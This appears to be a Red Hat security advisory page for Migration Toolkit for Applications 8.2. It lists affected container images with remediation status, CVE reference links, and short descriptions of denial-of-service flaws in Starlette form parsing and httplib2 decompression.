| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64 | — |
Workaround
|
A flaw was found in Starlette where the request.form() method silently ignores configured resource limits (max_fields and max_part_size) when parsing application/x-www-form-urlencoded data. An unauthenticated attacker can exploit this by sending a urlencoded request body with an arbitrarily large number of fields or an oversized field, causing denial of service through resource exhaustion.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64 | — |
Workaround
|
A flaw was found in httplib2, a Python HTTP client library. This vulnerability allows a malicious or compromised HTTP server to send a small compressed data payload that, when decompressed by httplib2, expands to an extremely large size in memory. This unbounded decompression can lead to a Denial of Service (DoS) by causing the client application to run out of memory and crash.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64 | — |
Workaround
|
| URL | Category |
|---|---|
| https://access.redhat.com/errata/RHSA-2026:43038 | self |
| https://access.redhat.com/security/cve/CVE-2026-13676 | external |
| https://access.redhat.com/security/cve/CVE-2026-25681 | external |
| https://access.redhat.com/security/cve/CVE-2026-27136 | external |
| https://access.redhat.com/security/cve/CVE-2026-28684 | external |
| https://access.redhat.com/security/cve/CVE-2026-33079 | external |
| https://access.redhat.com/security/cve/CVE-2026-33811 | external |
| https://access.redhat.com/security/cve/CVE-2026-34993 | external |
| https://access.redhat.com/security/cve/CVE-2026-35397 | external |
| https://access.redhat.com/security/cve/CVE-2026-39820 | external |
| https://access.redhat.com/security/cve/CVE-2026-39821 | external |
| https://access.redhat.com/security/cve/CVE-2026-40110 | external |
| https://access.redhat.com/security/cve/CVE-2026-40171 | external |
| https://access.redhat.com/security/cve/CVE-2026-42266 | external |
| https://access.redhat.com/security/cve/CVE-2026-42499 | external |
| https://access.redhat.com/security/cve/CVE-2026-42504 | external |
| https://access.redhat.com/security/cve/CVE-2026-42557 | external |
| https://access.redhat.com/security/cve/CVE-2026-42561 | external |
| https://access.redhat.com/security/cve/CVE-2026-44431 | external |
| https://access.redhat.com/security/cve/CVE-2026-44432 | external |
| https://access.redhat.com/security/cve/CVE-2026-44727 | external |
| https://access.redhat.com/security/cve/CVE-2026-44843 | external |
| https://access.redhat.com/security/cve/CVE-2026-45292 | external |
| https://access.redhat.com/security/cve/CVE-2026-48526 | external |
| https://access.redhat.com/security/cve/CVE-2026-48710 | external |
| https://access.redhat.com/security/cve/CVE-2026-48746 | external |
| https://access.redhat.com/security/cve/CVE-2026-48990 | external |
| https://access.redhat.com/security/cve/CVE-2026-5422 | external |
| https://access.redhat.com/security/cve/CVE-2026-54283 | external |
| https://access.redhat.com/security/cve/CVE-2026-59939 | external |
| https://access.redhat.com/security/cve/CVE-2026-6322 | external |
| https://access.redhat.com/security/updates/classi… | external |
| https://developers.redhat.com/products/mta/overview | external |
| https://docs.redhat.com/en/documentation/migratio… | external |
| https://security.access.redhat.com/data/csaf/v2/a… | self |
| https://access.redhat.com/security/cve/CVE-2026-5422 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2484037 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-5422 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-5422 | external |
| https://huntr.com/bounties/24a36953-6490-466f-8cb… | external |
| https://access.redhat.com/security/cve/CVE-2026-6322 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2466684 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-6322 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-6322 | external |
| https://cna.openjsf.org/security-advisories.html | external |
| https://github.com/fastify/fast-uri/security/advi… | external |
| https://access.redhat.com/security/cve/CVE-2026-13676 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2494197 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-13676 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-13676 | external |
| https://github.com/fastify/fast-uri/security/advi… | external |
| https://access.redhat.com/security/cve/CVE-2026-25681 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2480761 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-25681 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-25681 | external |
| https://go.dev/cl/781703 | external |
| https://go.dev/issue/79574 | external |
| https://groups.google.com/g/golang-announce/c/iI-… | external |
| https://pkg.go.dev/vuln/GO-2026-5029 | external |
| https://access.redhat.com/security/cve/CVE-2026-27136 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2480757 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-27136 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-27136 | external |
| https://go.dev/cl/781685 | external |
| https://go.dev/issue/79575 | external |
| https://pkg.go.dev/vuln/GO-2026-5030 | external |
| https://access.redhat.com/security/cve/CVE-2026-28684 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2459798 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-28684 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-28684 | external |
| https://github.com/theskumar/python-dotenv/commit… | external |
| https://github.com/theskumar/python-dotenv/releas… | external |
| https://github.com/theskumar/python-dotenv/securi… | external |
| https://access.redhat.com/security/cve/CVE-2026-33079 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2467298 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-33079 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-33079 | external |
| https://github.com/lepture/mistune/blob/df23edd60… | external |
| https://github.com/lepture/mistune/security/advis… | external |
| https://access.redhat.com/security/cve/CVE-2026-33811 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2467822 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-33811 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-33811 | external |
| https://go.dev/cl/767860 | external |
| https://go.dev/issue/78803 | external |
| https://groups.google.com/g/golang-announce/c/qcC… | external |
| https://pkg.go.dev/vuln/GO-2026-4981 | external |
| https://access.redhat.com/security/cve/CVE-2026-34993 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2484099 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-34993 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-34993 | external |
| https://github.com/aio-libs/aiohttp/commit/dcf40f… | external |
| https://github.com/aio-libs/aiohttp/security/advi… | external |
| https://access.redhat.com/security/cve/CVE-2026-35397 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2466858 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-35397 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-35397 | external |
| https://github.com/jupyter-server/jupyter_server/… | external |
| https://access.redhat.com/security/cve/CVE-2026-39820 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2467820 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-39820 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-39820 | external |
| https://go.dev/cl/759940 | external |
| https://go.dev/issue/78566 | external |
| https://pkg.go.dev/vuln/GO-2026-4986 | external |
| https://access.redhat.com/security/cve/CVE-2026-39821 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2480756 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-39821 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-39821 | external |
| https://go.dev/cl/767220 | external |
| https://go.dev/issue/78760 | external |
| https://pkg.go.dev/vuln/GO-2026-5026 | external |
| https://access.redhat.com/security/cve/CVE-2026-40110 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2466912 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-40110 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-40110 | external |
| https://github.com/jupyter-server/jupyter_server/… | external |
| https://github.com/jupyter-server/jupyter_server/… | external |
| https://github.com/jupyter-server/jupyter_server/… | external |
| https://github.com/jupyter-server/jupyter_server/… | external |
| https://access.redhat.com/security/cve/CVE-2026-40171 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2467453 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-40171 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-40171 | external |
| https://github.com/jupyter/notebook/security/advi… | external |
| https://access.redhat.com/security/cve/CVE-2026-42266 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2477072 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-42266 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-42266 | external |
| https://github.com/jupyterlab/jupyterlab/security… | external |
| https://access.redhat.com/security/cve/CVE-2026-42499 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2467809 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-42499 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-42499 | external |
| https://go.dev/cl/771520 | external |
| https://go.dev/issue/78987 | external |
| https://pkg.go.dev/vuln/GO-2026-4977 | external |
| https://access.redhat.com/security/cve/CVE-2026-42504 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2484204 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-42504 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-42504 | external |
| https://go.dev/cl/774481 | external |
| https://go.dev/issue/79217 | external |
| https://groups.google.com/g/golang-announce/c/tKs… | external |
| https://pkg.go.dev/vuln/GO-2026-5038 | external |
| https://access.redhat.com/security/cve/CVE-2026-42557 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2477086 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-42557 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-42557 | external |
| https://github.com/jupyterlab/jupyterlab/security… | external |
| https://access.redhat.com/security/cve/CVE-2026-42561 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2477309 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-42561 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-42561 | external |
| https://github.com/Kludex/python-multipart/securi… | external |
| https://access.redhat.com/security/cve/CVE-2026-44431 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2477167 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-44431 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-44431 | external |
| https://github.com/urllib3/urllib3/security/advis… | external |
| https://access.redhat.com/security/cve/CVE-2026-44432 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2477154 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-44432 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-44432 | external |
| https://github.com/urllib3/urllib3/security/advis… | external |
| https://access.redhat.com/security/cve/CVE-2026-44727 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2491516 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-44727 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-44727 | external |
| https://github.com/jupyter-server/jupyter_server/… | external |
| https://github.com/jupyter-server/jupyter_server/… | external |
